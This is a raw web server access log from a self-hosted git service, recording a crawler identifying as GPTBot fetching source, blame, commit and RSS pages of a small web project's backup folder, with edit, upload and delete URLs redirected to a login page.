"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/vite.config.ts" -[17/Feb/2026:15:58:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/.gitignore" -[17/Feb/2026:15:58:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11490] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/vite.config.ts" -[17/Feb/2026:15:58:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 9790] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/vite.config.ts" -[17/Feb/2026:15:58:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/vite.config.ts" -[17/Feb/2026:15:58:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 9780] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/App.tsx" -[17/Feb/2026:15:58:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/types.ts" [Client 74.7.227.38] [Length 11055] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/types.ts" -[17/Feb/2026:15:58:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 830] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/vite.config.ts" -[17/Feb/2026:15:58:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/README.md" [Client 74.7.227.38] [Length 11233] [Gzip 3.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/README.md" -[17/Feb/2026:15:58:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/types.ts" [Client 74.7.227.38] [Length 9786] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/types.ts" -[17/Feb/2026:15:58:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/README.md" [Client 74.7.227.38] [Length 9783] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/README.md" -[17/Feb/2026:15:58:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/services" [Client 74.7.227.38] [Length 9789] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/services" -[17/Feb/2026:15:58:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/README.md" -[17/Feb/2026:15:58:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12746] [Gzip 5.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/App.tsx" -[17/Feb/2026:15:58:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 822] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/.gitignore" -[17/Feb/2026:15:58:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/README.md" [Client 74.7.227.38] [Length 820] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/README.md" -[17/Feb/2026:15:58:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 816] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/App.tsx" -[17/Feb/2026:15:58:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/App.tsx" -[17/Feb/2026:15:58:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/types.ts" [Client 74.7.227.38] [Length 818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/types.ts" -[17/Feb/2026:15:58:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/types.ts" -[17/Feb/2026:15:58:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/vite.config.ts" -[17/Feb/2026:15:58:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/vite.config.ts" -[17/Feb/2026:15:58:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/components" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components" -[17/Feb/2026:15:58:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/components" -[17/Feb/2026:15:58:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/assets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets" -[17/Feb/2026:15:58:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/assets" -[17/Feb/2026:15:58:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/.Backup/html/services" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/services" -[17/Feb/2026:15:58:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/.Backup/html/services" -[17/Feb/2026:15:58:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/services" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/services" -[17/Feb/2026:15:58:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/services" -[17/Feb/2026:15:58:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/vite.config.ts" -[17/Feb/2026:15:58:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/vite.config.ts" -[17/Feb/2026:15:58:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/App.tsx" -[17/Feb/2026:15:58:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/App.tsx" -[17/Feb/2026:15:58:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/App.tsx" -[17/Feb/2026:15:58:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/App.tsx" -[17/Feb/2026:15:58:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/.gitignore" -[17/Feb/2026:15:58:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/.gitignore" -[17/Feb/2026:15:58:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/types.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/types.ts" -[17/Feb/2026:15:58:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/types.ts" -[17/Feb/2026:15:58:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/README.md" -[17/Feb/2026:15:58:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/README.md" -[17/Feb/2026:15:58:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/README.md" -[17/Feb/2026:15:58:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/README.md" -[17/Feb/2026:15:58:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/assets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets" -[17/Feb/2026:15:58:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/assets" -[17/Feb/2026:15:58:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/App.tsx" -[17/Feb/2026:15:58:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/App.tsx" -[17/Feb/2026:15:58:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/vite.config.ts" -[17/Feb/2026:15:58:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/vite.config.ts" -[17/Feb/2026:15:58:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/App.tsx" -[17/Feb/2026:15:58:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/App.tsx" -[17/Feb/2026:15:58:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" -[17/Feb/2026:15:58:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/README.md" -[17/Feb/2026:15:58:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/README.md" -[17/Feb/2026:15:58:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/README.md" -[17/Feb/2026:15:58:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/types.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/types.ts" -[17/Feb/2026:15:58:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/types.ts" -[17/Feb/2026:15:58:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/.Backup/html/components" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components" -[17/Feb/2026:15:58:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/.Backup/html/components" -[17/Feb/2026:15:58:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/.gitignore" -[17/Feb/2026:15:58:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/.gitignore" -[17/Feb/2026:15:58:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/types.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/types.ts" -[17/Feb/2026:15:58:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/types.ts" -[17/Feb/2026:15:58:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/services" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/services" -[17/Feb/2026:15:58:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/services" -[17/Feb/2026:15:58:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/types.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/types.ts" -[17/Feb/2026:15:58:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/types.ts" -[17/Feb/2026:15:58:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/.gitignore" -[17/Feb/2026:15:58:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/.gitignore" -[17/Feb/2026:15:58:31 +0000] - 303 